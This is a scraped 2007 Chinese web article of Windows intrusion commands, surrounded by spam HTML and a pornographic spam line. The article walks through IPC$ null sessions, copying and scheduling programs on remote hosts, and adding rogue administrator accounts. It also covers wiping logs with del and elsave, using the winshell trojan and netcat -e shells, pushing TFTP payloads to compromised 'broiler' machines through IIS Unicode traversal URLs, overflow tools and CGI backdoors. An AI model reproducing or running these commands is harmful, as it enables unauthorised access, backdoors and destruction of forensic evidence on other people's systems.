• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • 網絡管理員和黑客都應知道的幾條命令

    發表于:2007-07-13來源:作者:點擊數: 標簽:
    常用的幾條NET命令: (與遠程主機建立空管連接) .net use file://IP/地址\ipc$ /use: (以管理員身份登錄遠程主機) net use file://IP/地址\ipc$ 密碼 /use:Administrator (傳送文件到遠程主機WINNT目錄下)copy 本機目錄路徑\程序 file://IP/地址\admin

    常用的幾條NET命令:

     ?。ㄅc遠程主機建立空管連接).net use file://IP/地址\ipc$ "" /use:""

     ?。ㄒ怨芾韱T身份登錄遠程主機) net use file://IP/地址\ipc$ "密碼" /use:"Administrator"

     ?。▊魉臀募竭h程主機WINNT目錄下)copy 本機目錄路徑\程序 file://IP/地址\admin$

     ?。ú榭催h程主機時間) net time file://IP/地址

     ?。ǘ〞r啟動某個程序) at file://IP/地址 02:18 readme.exe

     ?。ú榭垂蚕恚?net view file://IP/地址

     ?。ú榭磏etbios工作組列表) nbtstat -A IP地址

     ?。▽⑦h程主機C盤映射為自己的F盤) net use f: file://IP/地址\c$ ""/user:"Administrator"

     ?。ㄟ@兩條把自己增加到管理員組): net user 用戶名 密碼 /add

      net localgroup Administrators 用戶名 /add

     ?。〝嚅_連接) net use file://IP/地址\ipc$ /delete

      掃尾:

      del C:\winnt\system32\logfiles\*.*

      del C:\winnt\ssytem32\config\*.evt

      del C:\winnt\system32\dtclog\*.*

      del C:\winnt\system32\*.log

      del C:\winnt\system32\*.txt

      del C:\winnt\*.txt

      del C:\winnt\*.log

      一、netsvc.exe

      下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:

      netsvc /list file://IP/地址

      netsvc schedule file://IP/地址 /query

      netsvc file://IP/地址 schedule /start

      二、OpenTelnet.exe

      遠程啟動主機的Telnet服務,并綁定端口到7878,例如:

      OpenTelnet file://IP/地址 用戶名 密碼 1 7878

      然后就可以telnet到主機的7878端口,進入DOS方式下:

      telnet IP地址 7878 三、winshell.exe

      一個非常小的木馬(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>后,可打下面的命令:

      p Path (查看winshell主程序的路徑信息)

      b reBoot (重新啟動機器)

      d shutDown (關閉機器)

      s Shell (執行后你就會看到可愛的“C:\>”)

      x eXit (退出本次登錄會話,此命令并不終止winshell的運行)

      CMD> http://.../srv.exe (通過http下載其他網站上的文件到運行winshell的機器上)

      四、3389登陸器,GUI方式登錄遠程主機的

      五、elsave.exe

      事件日志清除工具

      elsave -s file://IP/地址 -l "application" -C

      elsave -s file://IP/地址 -l "system" -C

      elsave -s file://IP/地址 -l "security" -C

      執行后成功清除應用程序日志,系統日志,安全日志

      六、hbulot.exe

      開啟win2kserver和winxp的3389服務

      hbulot [/r]

      使用/r表示安裝完成后自動重起目標使設置生效。

      七、nc.exe(netcat.exe)

      一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。

      想要連接到某處: nc [-options] hostname port[s] [ports] ...

      綁定端口等待連接: nc -l -p port [-options] [hostname] [port]

      參數:

      -e prog 程序重定向,一旦連接,就執行 [危險!!]

      -g gateway source-routing hop point[s], up to 8

      -G num source-routing pointer: 4, 8, 12, ...

      -h 幫助信息

      -i secs 延時的間隔

      -l 監聽模式,用于入站連接

      -n 指定數字的IP地址,不能用hostname

      -o file 記錄16進制的傳輸

      -p port 本地端口號

      -r 任意指定本地及遠程端口

      -s addr 本地源地址

      -u UDP模式

      -v 詳細輸出——用兩個-v可得到更詳細的內容

      -w secs timeout的時間

      -z 將輸入輸出關掉——用于掃描時 八、TFTPD32.EXE

      把自己的電腦臨時變為一臺FTP服務器,讓肉雞來下載文件,tftp命令要在肉雞上執行,通常要利用Unicode漏洞或telnet到肉雞,例如:

      http://ip/地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 文件名 c:\winnt\system32\文件名

      然后可以直接令文件運行:

      http://ip/地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 九、prihack.exe是IIS的printer遠程緩沖區溢出工具。

      idqover.exe是溢出idq的,選擇“溢出后在一個端口監聽”,然后用telnet連接它的監聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。

      一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行權限的目錄。然后用IE瀏覽器連接。

    一、Xscan命令行運行參數說明:

    在檢測過程中,按"[空格]"鍵可以查看各線程狀態及掃描進度,按"q"鍵保存當前數據后提前退出程序,按""強行關閉程序。

    1.命令格式: xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項]

    xscan -file <主機列表文件名> <檢測項目> [其他選項]

    其中<檢測項目> 含義如下:

    -port : 檢測常用服務的端口狀態(可通過\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"項定制待檢測端口列表);

    -ftp : 檢測FTP弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);

    -ntpass : 檢測NT-Server弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);

    -cgi : 檢測CGI漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);

    -iis : 檢測IIS漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);

    [其他選項] 含義如下:

    -v: 顯示詳細掃描進度

    -p: 跳過Ping不通的主機

    -o: 跳過沒有檢測到開放端口的主機

    -t <并發線程數量[,并發主機數量]>: 指定最大并發線程數量和并發主機數量, 默認數量為100,10

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>